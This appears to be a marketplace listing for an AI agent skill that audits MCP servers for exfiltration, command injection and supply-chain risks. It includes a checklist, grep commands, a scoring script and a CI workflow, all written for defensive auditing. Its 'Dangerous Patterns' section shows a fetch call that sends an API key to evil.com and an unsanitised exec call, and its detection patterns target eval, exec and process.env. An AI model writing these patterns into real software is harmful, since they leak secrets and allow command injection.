
Skill Mcp Security Audit

by Erwin · GitHub ↗ · v1.1.0 · MIT-0
cross-platform · Security: Clean · 57 downloads · 0 stars · 0 active installs · 1 version
Install in OpenClaw: /install mcp-security-audit
Description
Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use.
README (SKILL.md)

MCP Security Audit 🔒

Don't blindly trust MCP servers. Audit them first.

The Problem

MCP (Model Context Protocol) servers give AI agents powerful capabilities - file access, API calls, code execution. But they can also:

  • Exfiltrate data to external servers
  • Execute arbitrary commands on your machine
  • Access files beyond intended scope
  • Chain vulnerabilities for privilege escalation

Real incident: CVE-2026-23744 exposed MCP injection vulnerabilities. Supply chain attacks via compromised MCP packages are a growing threat.

Quick Audit Checklist

1. Source Verification ✅

□ Is this an official/verified package?
□ Check npm/PyPI download counts and maintainer history
□ Review recent commits for suspicious changes
□ Verify package signature if available

2. Network Audit 🌐

□ List all external URLs/domains the MCP connects to
□ Check for hardcoded API endpoints
□ Verify TLS certificate validation is enabled
□ Flag any data sent to unknown domains

3. File Access Audit 📁

□ What directories can the MCP read/write?
□ Is access scoped to project directory only?
□ Check for path traversal vulnerabilities
□ Flag any access to ~/.ssh, ~/.config, env files

4. Command Execution Audit ⚡

□ Does the MCP execute shell commands?
□ Are commands user-controlled or hardcoded?
□ Check for command injection vectors
□ Verify sandboxing/isolation if present

5. Permission Scope Audit 🔑

□ What permissions does the MCP request?
□ Are permissions minimal (principle of least privilege)?
□ Check for excessive scope requests
□ Verify user consent for sensitive operations

6. Dependency Audit 📦

□ Run npm audit / pip-audit / cargo audit
□ Check for known CVEs in dependencies
□ Flag outdated packages with security fixes
□ Review transitive dependencies

Audit Commands

For npm-based MCP servers:

# Check package.json for suspicious scripts
cat package.json | jq '.scripts'

# Audit dependencies
npm audit

# Check for post-install scripts
cat package.json | jq '.scripts.postinstall, .scripts.preinstall'

# List network calls (requires grep)
grep -r "fetch\|axios\|http\|https\|ws://" src/ --include="*.js" --include="*.ts"

For Python MCP servers:

# Check requirements.txt for suspicious packages
cat requirements.txt

# Audit dependencies
pip-audit

# Check for network calls
grep -r "requests\|urllib\|httpx\|aiohttp" src/ --include="*.py"

# Check for subprocess calls
grep -r "subprocess\|os.system\|exec\|eval" src/ --include="*.py"

Risk Scoring

| Category     | Weight | High Risk Indicators                              |
| ------------ | ------ | ------------------------------------------------- |
| Network      | 30%    | Unknown domains, no TLS, data exfil patterns      |
| File Access  | 25%    | Home dir access, path traversal, sensitive files  |
| Command Exec | 25%    | Unsanitized input, shell=True, arbitrary commands |
| Dependencies | 15%    | Known CVEs, unmaintained packages                 |
| Source       | 5%     | Unverified maintainer, recent ownership change    |

Score ≥ 70: High risk - Do not use without review
Score 40-69: Medium risk - Use with caution
Score < 40: Low risk - Generally safe
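As an added example (not code from the skill or its author) tying the Audit Commands and Risk Scoring sections together: a small Node script that scans constructed source text for the network, file-access and command-execution indicators the grep commands look for, then applies the table's weights and thresholds. The regexes are heuristics written for this example, and the dependency and source severities are assumed to be supplied by the auditor from npm audit / pip-audit and maintainer review.

```javascript
const WEIGHTS = { network: 30, fileAccess: 25, commandExec: 25, dependencies: 15, source: 5 };

// [pattern, severity 0-100, description]; a category's severity is its highest match.
// Heuristic regexes modelled on the grep commands above, not a parser.
const INDICATORS = {
  network: [
    [/https?:\/\/(?!localhost)[\w.-]+/, 40, 'external endpoint'],
    [/fetch\([^)]*process\.env/, 100, 'environment variable sent over the network'],
  ],
  fileAccess: [
    [/readFileSync\(\s*[A-Za-z_$][\w$]*\s*\)/, 60, 'path read without validation'],
    [/~\/\.ssh|~\/\.config|\.env['"]/, 80, 'sensitive file or directory referenced'],
  ],
  commandExec: [
    [/\bexec\(\s*`[^`]*\$\{/, 100, 'template string passed to a shell'],
    [/\beval\(|\batob\(/, 100, 'dynamic or obfuscated code'],
  ],
};

// Scan { fileName: sourceText }; returns findings and per-category severity.
function scanSources(sources) {
  const findings = [];
  const severity = { network: 0, fileAccess: 0, commandExec: 0 };
  for (const [file, text] of Object.entries(sources)) {
    for (const [category, rules] of Object.entries(INDICATORS)) {
      for (const [re, sev, detail] of rules) {
        if (!re.test(text)) continue;
        findings.push({ file, category, detail });
        severity[category] = Math.max(severity[category], sev);
      }
    }
  }
  return { findings, severity };
}

// Dependency and source severities come from npm audit / pip-audit and maintainer
// review, so the auditor passes them in; weights sum to 100, giving a 0-100 score.
function riskScore(severity, external = { dependencies: 0, source: 0 }) {
  const all = { ...severity, ...external };
  return Math.round(Object.entries(WEIGHTS).reduce((s, [k, w]) => s + w * (all[k] || 0), 0) / 100);
}
const verdict = (score) => (score >= 70 ? 'High' : score >= 40 ? 'Medium' : 'Low');

// Constructed sample reusing the dangerous patterns shown later on this page.
const SAMPLE = { 'src/tools.js': [
  'fs.readFileSync(userInput);',
  'exec(`git ${userBranch}`);',
  "fetch('https://evil.com/steal?token=' + process.env.API_KEY);",
].join('\n') };
const audit = scanSources(SAMPLE);
console.log(audit.findings, riskScore(audit.severity), verdict(riskScore(audit.severity)));
```

With the three dangerous patterns alone the sample lands exactly on the 70-point High threshold, which is a reminder that the score is a triage aid and a single confirmed exfiltration finding should be treated as a reject regardless of the total.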

Red Flags 🚩

Immediately reject MCP servers with:

  1. Obfuscated code - eval(atob('...')) or similar
  2. Dynamic code loading - Loading code from remote URLs
  3. Environment variable exfil - Sending process.env or os.environ externally
  4. Credential harvesting - Asking for passwords/tokens unnecessarily
  5. No source code - Binary-only distributions without reproducible builds

Audit Report Template

# MCP Security Audit Report

**Server**: [name]
**Version**: [version]
**Audited**: [date]
**Risk Score**: [score]/100

## Findings

### Critical
- [list critical issues]

### High
- [list high issues]

### Medium
- [list medium issues]

### Low
- [list low issues]

## Recommendations

1. [recommendation]
2. [recommendation]

## Verdict

[ ] APPROVED - Safe to use
[ ] APPROVED WITH CAUTION - Review recommendations
[ ] REJECTED - Too many risks

Common MCP Security Patterns

Safe Patterns ✅

// Scoped file access
const allowedDir = path.resolve(process.cwd(), 'data');
const resolved = path.resolve(allowedDir, filePath); // collapses '..' and absolute inputs before the check
if (resolved !== allowedDir && !resolved.startsWith(allowedDir + path.sep)) throw new Error('Access denied');

// Sanitized commands
const allowedCommands = ['git', 'npm', 'node'];
if (!allowedCommands.includes(cmd)) throw new Error('Command not allowed');

// Explicit user consent
if (!await askUserConsent('Allow access to X?')) return;

Dangerous Patterns ❌

// DON'T: Unrestricted file read
fs.readFileSync(userInput); // Path traversal!

// DON'T: Shell injection
exec(`git ${userBranch}`); // Command injection!

// DON'T: Credential exposure
fetch('https://evil.com/steal?token=' + process.env.API_KEY);

Integration with CI/CD

Add to your workflow:

# .github/workflows/mcp-audit.yml
name: MCP Security Audit
on: [push, pull_request]

jobs:
  audit:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: Audit MCP servers
        run: |
          # Add your audit commands here
          npm audit
          # Fail the job only when suspicious patterns are found. A bare
          # `grep ... && exit 1` also fails on a clean tree, because grep
          # exits 1 when nothing matches and that status ends the step.
          if grep -rn "eval(\|exec(\|process\.env" mcp-servers/; then exit 1; fi

Related Skills

  • prompt-guard - Protect against prompt injection
  • skill-error-recovery - Handle MCP connection failures gracefully
  • token-budget-guard - Monitor MCP token usage


Remember: Every MCP server you add expands your agent's attack surface. Audit before you trust.

Usage Guidance
This is a procedural audit checklist (no code). It's generally safe to use. Before running the recommended commands, ensure you have local copies of the MCP server code (don't run arbitrary install scripts from untrusted packages), run the audit in an isolated environment if possible, and make sure the host has the tools the guide references (jq, grep, npm, pip-audit). The checklist may produce false positives; use manual review for high-risk findings and verify package provenance and signatures before enabling an MCP server in production.
Capability Analysis
Type: OpenClaw Skill
Name: mcp-security-audit
Version: 1.1.0
The skill bundle is a defensive security tool designed to guide an AI agent in auditing Model Context Protocol (MCP) servers for vulnerabilities. Both SKILL.md and README.md provide legitimate security checklists, risk scoring frameworks, and standard audit commands (e.g., 'npm audit', 'grep' for sensitive patterns) aimed at detecting data exfiltration and command injection. There is no evidence of malicious intent, obfuscation, or harmful instructions; the content is entirely aligned with its stated purpose of improving security posture.
Capability Tags
requires-sensitive-credentials
Capability Assessment
Purpose & Capability
The name/description and the SKILL.md consistently describe an MCP security audit. The skill requests no credentials, binaries, or installs, which is proportionate for a procedural audit/checklist.
Instruction Scope
The SKILL.md tells the operator to run local inspection commands (grep, npm audit, pip-audit, review package.json, etc.) and to check for access to sensitive paths like ~/.ssh or process.env. Those actions are appropriate for an audit, but they assume access to source code and host tooling. The instructions do not instruct exfiltration or contacting any hidden endpoints.
Install Mechanism
No install spec or code files — instruction-only — so nothing will be written to disk by the skill itself. This is the lowest-risk install model.
Credentials
The skill declares no required environment variables or credentials. The SKILL.md sensibly recommends checking for credential leakage but does not ask for secrets from the user.
Persistence & Privilege
The skill's always flag is false and the skill is user-invocable; model invocation is allowed (the platform default). There is no request for permanent system presence or to modify other skills or global agent settings.
How to Use
  1. Make sure OpenClaw is installed (local or Docker)
  2. Run the install command in chat: /install mcp-security-audit
  3. After installation, invoke the skill by name or use /mcp-security-audit
  4. Provide required inputs per the skill's parameter spec and get structured output
Version History
v1.1.0
v1.1: Audit flow diagram, sample report, safe/unsafe code patterns
Metadata
Slug mcp-security-audit
Version 1.1.0
License MIT-0
All-time Installs 0
Active Installs 0
Total Versions 1
Frequently Asked Questions

What is Skill Mcp Security Audit?

Perform a security audit of MCP servers to detect data exfiltration, command injection, permission escalation, and supply chain vulnerabilities before use. It is an AI Agent Skill for Claude Code / OpenClaw, with 57 downloads so far.

How do I install Skill Mcp Security Audit?

Run "/install mcp-security-audit" in the OpenClaw or Claude Code chat to install it in one step — no extra setup required.

Is Skill Mcp Security Audit free?

Yes, Skill Mcp Security Audit is completely free, licensed under MIT-0. You can download, install and use it at no cost.

Which platforms does Skill Mcp Security Audit support?

Skill Mcp Security Audit is cross-platform and runs anywhere OpenClaw / Claude Code is available (cross-platform).

Who created Skill Mcp Security Audit?

It is built and maintained by Erwin (@aptratcn); the current version is v1.1.0.
